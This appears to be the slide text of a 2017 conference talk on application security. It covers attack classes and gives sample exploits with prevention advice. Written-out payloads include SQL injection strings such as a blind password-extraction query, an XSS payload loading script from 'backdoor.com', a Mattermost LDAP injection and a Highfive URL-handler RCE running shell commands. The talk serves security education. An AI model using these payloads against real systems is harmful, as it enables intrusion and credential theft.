The document discusses various aspects of application security, including potential attack vectors such as code execution, SQL injection, and cross-site scripting. It provides examples of these attacks and suggests preventive measures like proper escaping, code reviews, and incident escalation plans. The document emphasizes the importance of staying updated on security issues and reacting swiftly to incidents.

1. Application Security
AOE Conf 2017

2. What is
Application Security?

3. Application Security
• Security in software
• Not management security, perimeter security, etc
• Possible Attack vectors
• How to prevent issues

4. Attack vectors

5. Code Execution
Make a system execute arbitrary code

6. Buffer Overflows
• Assembler code injected into memory
• 1996, Aleph One, "Smashing the stack for fun and profit"
• Possible by overflowing a programs memory with
controlled data

7. SQL Injection
• Execute arbitrary SQL code
• Possible by interpolating user-submitted data without
proper escaping
• Can be used to read/write files on DB server

8. Cross Site Scripting
• Execute arbitrary JavaScript in a privileged context
• Executed on a client's machine
• Privileged context: Browser (domain/cookies)
• Steal/Modify cookies
• AJAX Requests to privileged areas

9. Cryptography
Attack cryptographic measures for confidentiality and
integrity

10. Signatures
• Fake signatures/tokens for unauthorised access

11. Encryption
• Break encryption
• Missing encryption
• Broken Encryption:
• Example: Bleichenbacher RSA

12. Business Logic
Make legit code behave in an unintended way

13. Race Conditions
• Re-order execution flows to change an operations result

14. Exploit basics

15. SQL Injection
• Query: SELECT * FROM users WHERE
username="${USERNAME}" AND
password="${PASSWORD}";
• Username: Bastian
• Passwort: Sesame098
• Query: SELECT * FROM users WHERE
username="Bastian" AND
password="Sesame098";

16. SQL Injection
• Query: SELECT * FROM users WHERE
username="${USERNAME}" AND
password="${PASSWORD}";
• Username: Bastian
• Passwort: " OR 1=1 -- x
• Query: SELECT * FROM users WHERE
username="Bastian" AND
password="" OR 1=1 -- x";

17. SQL Injection
• Query: SELECT * FROM logs WHERE
token="${TOKEN}";
• Token: a" AND IF(SUBSTRING(
(SELECT password FROM users WHERE
name="admin" LIMIT 1)
,0,1) = 'a', SLEEP(5), 0) -- x
• Query: SELECT * FROM logs WHERE
token="a" AND IF(SUBSTRING(
(SELECT password FROM users WHERE
name="admin" LIMIT 1)
,0,1) = 'a', SLEEP(5), 0) -- x";

18. Cross-Site Scripting
• Template: <a href="${page}">You are here</a>
• URL: http://example.com/page=hello
• Template: <a href="hello">You are here</a>

19. Cross-Site Scripting
• Template: <a href="${page}">You are here</a>
• URL: http://example.com/page="><script
src="http://backdoor.com/x.js"></script>
• Template: <a href=""><script src="http://
backdoor.com/x.js"></script>">You are
here</a>

20. Cross-Site Scripting
• Code runs in Browser of the one opening the link
• Access to Cookies+LocalStorage
• Can send requests and read their result (emulate
administrator behaviour)
• Change page look/behaviour (steal passwords, etc)

21. Exploits samples

22. Mattermost LDAP Injection
• https://mattermost/api/v3/users/login
• login_id: username)(givenName=test*
• password: ""
• Response:
• 401: OK, query successful
• 50x: Error, query failed

23. Mattermost LDAP Injection

24. Mattermost LDAP Injection

25. Mattermost LDAP Injection

26. Mattermost LDAP Injection
• Prevention: properly escape characters which might be
interpreted by LDAP

27. Highfive RCE
• Target: URL-Handler highfive://
• Possible arguments: ?domain=, ?protocol=

28. Highfive RCE
Privileged
Non-Privileged Display Web-pages
Execute processes etc
Highfive Sandbox (NW.js)
Whitelist:
https://highfive.com
https://dev.highfive.com

29. Highfive RCE
• highfive://test.com.a/?
domain=alert(require('child_process').execSyn
c('hostname;echo;id').toString())//
&protocol=javascript
• Starts Highfive on a privileged initial domain
• Redirects to: protocol + '://' + domain + path
• Becomes:
javascript://
alert(require('child_process').execSync('host
name;echo;id').toString())//something

30. Highfive RCE
• Redirect to javascript:// does not change the
sandbox
• Works on any operating system
• Thank you JavaScript 😙

31. Highfive RCE
• Prevention: whitelist redirect targets

32. JWT Null Tokens

33. JWT Null Tokens

34. JWT Null Tokens

35. JWT Null Tokens

36. JWT Null Tokens
• Prevention: Do not allow null signature algorithms

37. Preventive actions

38. Finding Security issues
• Code Reviews
• Curiosity
• (sometimes: automated scanners)

39. Stay up to date

40. React fast

41. React fast
• Escalation plan for security incidents
• Fast deployment strategies
• Firewall setup to cut off possible infected systems
• Snapshot infrastructure for later analysis

42. Thank you :)
Questions?